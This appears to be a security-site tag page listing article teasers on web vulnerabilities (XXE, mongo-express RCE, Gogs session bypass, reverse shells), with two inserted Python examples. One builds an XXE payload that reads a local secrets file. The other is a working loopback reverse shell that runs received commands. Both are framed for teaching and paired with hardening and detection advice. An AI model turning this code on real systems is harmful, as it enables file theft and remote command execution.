Article Tags
How to analyze the source code leak vulnerability of Facebook Ads advertising business API interface

More than a month after my previous vulnerability discovery, I found a vulnerability in the API of the Facebook Ads advertising business system. The vulnerable API is an image-processing interface used by Facebook merchant accounts to upload advertising images. Uploaded images are stored in a directory called "/adimages" and encoded in Base64. My test idea was therefore that a malicious payload could be injected into the uploaded image, which the API converts to Base64 and then passes on to Facebook's server. The following is the POST request used to upload images: POST /v2.10/act_123456789/adimages HTT

May 11, 2023 pm 05:40 PM
API Facebook ads
Example analysis of XML external entity injection vulnerability

1. XML external entity injection. An XML external entity injection vulnerability is what is commonly called an XXE vulnerability. XML is a widely used data-exchange format, and many applications contain code that processes XML data. By default, many outdated or improperly configured XML processors resolve external entities. If an attacker can upload an XML document, or add malicious content to an XML document that reaches a flawed XML processor through vulnerable code, dependencies or integrations, they can attack that processor. XXE does not depend on the development language: as long as the application parses XML data and that data is controlled by the user, the application may be vulnerable to XXE attacks. This article uses Java

May 11, 2023 pm 04:55 PM
xml
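The mechanism described above, shown as an added example rather than code from the article (the article's own examples are in Java; this one uses Python's standard-library SAX parser, whose `feature_external_ges` flag switches external entity resolution on and off). The "secret" file, the payload and all names are constructed here for the demonstration: the vulnerable configuration inlines the file contents into the document text, the hardened one does not, and a DOCTYPE pre-check rejects the payload before any parser flag matters.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Collects every run of character data the parser emits, so we can see
    what an entity reference expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(xml_bytes, resolve_external_entities):
    """Parse the document and return its concatenated text content.

    resolve_external_entities=True reproduces the dangerous configuration:
    SYSTEM entities are fetched and inlined (XXE). False is the hardened
    setting (and Python's default since 3.7.1): the reference expands to
    nothing and no file or URL is touched."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def has_doctype(xml_bytes):
    """Defence-in-depth check: user-supplied XML should never need a DTD,
    so refuse anything that declares one instead of relying on parser
    flags alone (XML keywords are case-sensitive, so this match is exact)."""
    return b"<!DOCTYPE" in xml_bytes


def build_attack_document(secret_path):
    """Constructed attacker payload: an external entity pointing at a local
    file, referenced from inside the document body."""
    file_url = pathlib.Path(secret_path).as_uri().encode()
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE config [<!ENTITY xxe SYSTEM "' + file_url + b'">]>\n'
        b'<config><db>&xxe;</db></config>'
    )


def demo():
    """Write a fake secret file (constructed sample data), then parse the
    payload with both parser configurations.
    Returns (vulnerable_output, hardened_output)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")
        secret_path = f.name
    payload = build_attack_document(secret_path)
    vulnerable = parse_text(payload, resolve_external_entities=True)
    hardened = parse_text(payload, resolve_external_entities=False)
    return vulnerable, hardened


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser saw:", repr(leaked))
    print("hardened parser saw:  ", repr(safe))
```

The same two-layer approach carries over to Java: disable external general and parameter entities on the factory (or forbid the `disallow-doctype-decl` feature outright), and reject documents containing a DOCTYPE at the input boundary so that a misconfigured parser elsewhere in the stack is never reached.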
Remote code execution vulnerability case analysis

0x01 Get to know mongo-express. mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap 3. At present it is probably the MongoDB admin interface with the most stars on GitHub. Easy to deploy and simple to use, it has become the choice of many people for managing Mongo. 0x02 Set up the debugging environment. 0x1 Start the Docker service. After reading the official GitHub security bulletin, we found that the vulnerability affects all versions below 0.54.0. We chose 0.49 as the example for testing. Because of this vulnerability environment, M

May 11, 2023 pm 04:46 PM
mongo-express
Gogs arbitrary user login vulnerability instance analysis

1. Vulnerability background. Gogs is an open-source file/code management system (based on Git) similar to GitHub. The goal of Gogs is to provide the simplest, fastest and easiest way to set up a self-hosted Git service. Written in Go, Gogs ships as a standalone binary and supports every platform Go supports, including Linux, macOS, Windows and ARM. 2. Vulnerability description. Gogs is a self-hosted Git service platform that is easy to set up: it is easy to install, cross-platform and lightweight, and it has many users. In version 0.11.66 and earlier, (the go-macaron/session library) does not perform sessionid

May 11, 2023 pm 04:43 PM
gogs
What does "rebound shell" (reverse shell) mean?

*Stern statement: this article is limited to technical discussion and sharing; using it for illegal purposes is strictly prohibited. 0x00 Preface. A "rebound shell" (the usual English term is reverse shell) means that the controlling side listens on a TCP/UDP port, the controlled side initiates a connection to that port, and the controlled side redirects the input and output of its command line over that connection to the controller. Put simply, a reverse shell is a reverse connection: unlike a forward connection such as SSH, where we connect to the target, here the target's machine runs a command that connects back to us, so this technique is normally paired with a remote command execution vulnerability that lets us run that command. Why use a reverse shell? It is used when the controlled side cannot be reached inbound: a firewall blocks incoming connections, we lack the privileges to open a listening port, or the port we would use is already taken. Suppose we attack a machine and open a port on it; the attacker then connects from their own machine to the target. This

May 11, 2023 pm 04:25 PM
shell
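The connection direction described above, as an added example that is not part of the original article: both ends run on localhost in one process, the "controller" only listens, and the "controlled" side makes the outbound connection, reads a command, runs it and sends the output back. A real reverse shell would hand the socket straight to an interactive `/bin/sh`; running a single command per connection keeps the demonstration self-contained. Function names, the sample command and the loopback addresses are this example's own assumptions.

```python
import socket
import subprocess
import threading


def controller(listener, command):
    """The attacker's listener: accept the inbound connection from the
    target, send it one command line, then collect whatever comes back
    until the target closes the connection."""
    conn, _peer = listener.accept()
    with conn:
        conn.sendall(command.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)  # nothing more to send; wait for output
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def controlled_end(host, port):
    """The target side of a reverse shell: connect OUT to the controller
    (outbound traffic is what firewalls usually allow), read one command
    line, execute it, and send stdout and stderr back over the same socket."""
    with socket.create_connection((host, port)) as sock:
        buf = b""
        while not buf.endswith(b"\n"):
            data = sock.recv(4096)
            if not data:
                break
            buf += data
        cmd = buf.decode().strip()
        # shell=True mirrors the real thing: the command line is run by the
        # target's shell exactly as the controller typed it
        result = subprocess.run(cmd, shell=True, capture_output=True)
        sock.sendall(result.stdout + result.stderr)


def demo(command="echo reverse-shell-ok"):
    """Run both ends on the loopback interface and return the command output
    the controller received. Port 0 lets the OS pick a free port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    received = {}
    worker = threading.Thread(
        target=lambda: received.update(out=controller(listener, command))
    )
    worker.start()                      # controller is now waiting, like "nc -lvp PORT"
    controlled_end("127.0.0.1", port)   # the target dials back to the controller
    worker.join(timeout=10)
    listener.close()
    return received["out"]


if __name__ == "__main__":
    print(demo(), end="")
```

Note which side calls `accept()` and which side calls `create_connection()`: that, not the command execution, is what distinguishes a reverse shell from a bind shell, and it is why an outbound connection to an attacker-controlled port from a server that never initiates connections is a strong detection signal.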
Real experience sharing: Information security engineer of 'Du Xiaoman'

This article shares the questions I was asked when interviewing for the Information Security Engineer position at Du Xiaoman (Financial Security Department). I went through first, second and third rounds in total. Let's take a look together; I hope it will help those who need it~

Jan 12, 2023 pm 02:28 PM
security engineer
Let's see how to learn network protocols through the QUIC protocol

This article introduces the QUIC protocol and uses it as an example of how to go about learning a network protocol. I hope it will be helpful to everyone!

Mar 01, 2022 am 09:57 AM
QUIC protocol, network protocol
session consistency design

What is session consistency? A web server can automatically create a session for a user accessing it from the same browser and provide storage for it; user login information is usually kept in the session. What is the session-consistency problem? When there is only one web server in the backend, the correct session can be found for every HTTP request. The problem is that this does not provide high availability: if that one server goes down, every session is lost. Redundancy + failover: deploy multiple web servers, nginx path...

Jun 25, 2021 pm 06:09 PM
1
Introducing several commonly used web security authentication methods

This article introduces five commonly used web security authentication methods. It has some reference value, and I hope it can be helpful to everyone.

Mar 15, 2021 am 10:40 AM
web security authentication
How to keep the web safe

In the early days of the Internet, the era of the IE browser, people went online mainly to share information and get the news through the browser. With the rapid growth of the Internet, web pages can do more and more: you can not only read the news and play games, but also shop and chat. These capabilities have greatly enriched our lives.

Mar 09, 2021 am 09:51 AM
web security
Share solutions to several common web security risks

Web server security: this article shares solutions to several common web security risks. It has some reference value, and I hope it can be helpful to everyone.

Mar 01, 2021 am 10:44 AM
web security risks, solutions
Discuss the loopholes of a group buying website

Website security: this article shares my discussion of the vulnerabilities of a certain group-buying website. I hope it can help you.

Feb 20, 2021 am 10:58 AM
group-buying site, vulnerability
Windows server security settings summary

Windows Server is the core of the Microsoft Windows Server System (WSS) and is Microsoft's server operating system.

Feb 02, 2021 am 11:50 AM
windows, server, security
Is your product key really secure?

Perhaps because we use Windows systems every day, we have the illusion that our product keys are safe. Even the network administrators of some companies have never considered whether their product keys are secure.

Jan 28, 2021 am 10:40 AM
product key